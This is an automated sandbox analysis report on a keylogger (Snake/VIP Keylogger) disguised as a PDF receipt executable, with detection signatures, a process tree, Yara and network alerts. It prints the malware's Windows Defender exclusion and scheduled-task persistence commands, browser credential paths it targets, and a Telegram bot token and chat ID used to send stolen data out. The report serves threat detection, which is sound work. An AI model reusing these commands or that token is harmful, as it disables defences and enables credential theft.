Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rDEKONT-1_16_2025__75kb__pdf.exe

Overview

General Information

Sample name:rDEKONT-1_16_2025__75kb__pdf.exe
Analysis ID:1592453
MD5:14246ea59962956247cb757ff4c485e8
SHA1:41233827e40eacdc99a408d0b0ecfe78ee24120c
SHA256:f89d5db1d93b61d6e6346fa86e914a5b02e927c8eee905e658b0818f76a545ca
Tags:exeuser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rDEKONT-1_16_2025__75kb__pdf.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe" MD5: 14246EA59962956247CB757FF4C485E8)
    • powershell.exe (PID: 7500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7736 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7524 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • teXfNv.exe (PID: 7888 cmdline: C:\Users\user\AppData\Roaming\teXfNv.exe MD5: 14246EA59962956247CB757FF4C485E8)
    • schtasks.exe (PID: 7952 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • teXfNv.exe (PID: 8008 cmdline: "C:\Users\user\AppData\Roaming\teXfNv.exe" MD5: 14246EA59962956247CB757FF4C485E8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7293224337:AAGQ5dfI8Gbcc9C0VWXufkTkIt2XTgIrMks", "Chat id": "7727510436", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7293224337:AAGQ5dfI8Gbcc9C0VWXufkTkIt2XTgIrMks", "Chat_id": "7727510436", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 23 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.teXfNv.exe.4245570.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.teXfNv.exe.4245570.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                8.2.teXfNv.exe.4245570.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  8.2.teXfNv.exe.4245570.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2ba96:$a1: get_encryptedPassword
                  • 0x2bdaf:$a2: get_encryptedUsername
                  • 0x2b8b4:$a3: get_timePasswordChanged
                  • 0x2b9af:$a4: get_passwordField
                  • 0x2baac:$a5: set_encryptedPassword
                  • 0x2d1b5:$a7: get_logins
                  • 0x2d118:$a10: KeyLoggerEventArgs
                  • 0x2cd7d:$a11: KeyLoggerEventArgsEventHandler
                  8.2.teXfNv.exe.4245570.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x39849:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x38eec:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x39149:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x39b28:$a5: \Kometa\User Data\Default\Login Data
                  Click to see the 44 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe", ParentImage: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, ParentProcessId: 7328, ParentProcessName: rDEKONT-1_16_2025__75kb__pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", ProcessId: 7500, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe", ParentImage: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, ParentProcessId: 7328, ParentProcessName: rDEKONT-1_16_2025__75kb__pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", ProcessId: 7500, ProcessName: powershell.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\teXfNv.exe, ParentImage: C:\Users\user\AppData\Roaming\teXfNv.exe, ParentProcessId: 7888, ParentProcessName: teXfNv.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp", ProcessId: 7952, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe", ParentImage: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, ParentProcessId: 7328, ParentProcessName: rDEKONT-1_16_2025__75kb__pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp", ProcessId: 7524, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe", ParentImage: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, ParentProcessId: 7328, ParentProcessName: rDEKONT-1_16_2025__75kb__pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe", ProcessId: 7500, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe", ParentImage: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, ParentProcessId: 7328, ParentProcessName: rDEKONT-1_16_2025__75kb__pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp", ProcessId: 7524, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-16T07:02:04.974396+010028033053Unknown Traffic192.168.2.449735104.21.64.1443TCP
                  2025-01-16T07:02:07.607453+010028033053Unknown Traffic192.168.2.449742104.21.64.1443TCP
                  2025-01-16T07:02:08.850293+010028033053Unknown Traffic192.168.2.449745104.21.64.1443TCP
                  2025-01-16T07:02:10.145275+010028033053Unknown Traffic192.168.2.449749104.21.64.1443TCP
                  2025-01-16T07:02:10.191417+010028033053Unknown Traffic192.168.2.449750104.21.64.1443TCP
                  2025-01-16T07:02:11.507464+010028033053Unknown Traffic192.168.2.449753104.21.64.1443TCP
                  2025-01-16T07:02:14.088006+010028033053Unknown Traffic192.168.2.449761104.21.64.1443TCP
                  2025-01-16T07:02:14.088595+010028033053Unknown Traffic192.168.2.449762104.21.64.1443TCP
                  2025-01-16T07:02:15.411932+010028033053Unknown Traffic192.168.2.449765104.21.64.1443TCP
                  2025-01-16T07:02:16.746654+010028033053Unknown Traffic192.168.2.449769104.21.64.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-16T07:02:03.292929+010028032742Potentially Bad Traffic192.168.2.449733132.226.247.7380TCP
                  2025-01-16T07:02:04.292895+010028032742Potentially Bad Traffic192.168.2.449733132.226.247.7380TCP
                  2025-01-16T07:02:05.699112+010028032742Potentially Bad Traffic192.168.2.449737132.226.247.7380TCP
                  2025-01-16T07:02:06.983360+010028032742Potentially Bad Traffic192.168.2.449740132.226.247.7380TCP
                  2025-01-16T07:02:08.292851+010028032742Potentially Bad Traffic192.168.2.449740132.226.247.7380TCP
                  2025-01-16T07:02:09.538712+010028032742Potentially Bad Traffic192.168.2.449747132.226.247.7380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-16T07:02:15.004480+010018100071Potentially Bad Traffic192.168.2.449764149.154.167.220443TCP
                  2025-01-16T07:02:19.007972+010018100071Potentially Bad Traffic192.168.2.449775149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeAvira: detection malicious, Label: HEUR/AGEN.1310400
                  Found malware configuration
                  Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7293224337:AAGQ5dfI8Gbcc9C0VWXufkTkIt2XTgIrMks", "Chat_id": "7727510436", "Version": "4.4"}
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7293224337:AAGQ5dfI8Gbcc9C0VWXufkTkIt2XTgIrMks", "Chat id": "7727510436", "Version": "4.4"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeReversingLabs: Detection: 26%
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeVirustotal: Detection: 27%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeVirustotal: Detection: 27%Perma Link
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeReversingLabs: Detection: 26%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49734 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: mscorlib.pdb source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4162079442.0000000006324000.00000004.00000020.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4162004610.0000000006310000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 00EBF8E9h6_2_00EBF630
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 00EBFD41h6_2_00EBFA8B
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CB3C8h6_2_055CAFB0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CAE01h6_2_055CAB50
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CFBA5h6_2_055CF868
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CE9B1h6_2_055CE708
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CE423h6_2_055CE178
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_055C0040
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CF261h6_2_055CEFB8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CB3C8h6_2_055CAFA3
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CEE09h6_2_055CEB60
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055C0D0Dh6_2_055C0B30
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055C1697h6_2_055C0B30
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CD719h6_2_055CD470
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CF6B9h6_2_055CF410
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CB3C8h6_2_055CB2F6
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CDFC9h6_2_055CDD20
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 055CDB71h6_2_055CD8C8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D4B2Eh6_2_067D4860
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DE3C0h6_2_067DE0C8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D10F0h6_2_067D0E20
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D38EEh6_2_067D3620
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D58DEh6_2_067D5610
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D78CEh6_2_067D7600
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DA1A6h6_2_067D9ED8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DC196h6_2_067DBEC8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D420Eh6_2_067D3F40
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D61FEh6_2_067D5F30
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D81EEh6_2_067D7F20
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DF218h6_2_067DEF20
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DAAC6h6_2_067DA7F8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DCAB6h6_2_067DC7E8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DCF46h6_2_067DCC78
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D4FBEh6_2_067D4CF0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D6FAEh6_2_067D6CE0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D8F9Eh6_2_067D8CD0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DAF56h6_2_067DAC88
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D9897h6_2_067D95F0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DB876h6_2_067DB5A8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DD866h6_2_067DD598
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DE888h6_2_067DE590
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DED50h6_2_067DEA58
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D9D16h6_2_067D9A48
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DBD06h6_2_067DBA38
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DDD97h6_2_067DDA28
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then mov esp, ebp6_2_067D2AF0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D3D7Eh6_2_067D3AB0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D5D6Eh6_2_067D5AA0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D7D5Eh6_2_067D7A90
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DA636h6_2_067DA368
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DC627h6_2_067DC358
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then mov esp, ebp6_2_067D2B00
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DF6E0h6_2_067DF3E8
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D469Eh6_2_067D43D0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D668Eh6_2_067D63C0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D867Eh6_2_067D83B0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D6B1Eh6_2_067D6850
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D8B0Eh6_2_067D8840
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DFBA8h6_2_067DF8B0
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D743Eh6_2_067D7170
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D942Eh6_2_067D9160
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DB3E6h6_2_067DB118
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067DD3D6h6_2_067DD108
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D345Eh6_2_067D3190
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 4x nop then jmp 067D544Eh6_2_067D5180
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 00FFF8E9h11_2_00FFF630
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 00FFFD41h11_2_00FFFA8B
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FB3C8h11_2_055FAFB0
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FAE01h11_2_055FAB50
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FFBA5h11_2_055FF868
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FE9B1h11_2_055FE708
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FE423h11_2_055FE178
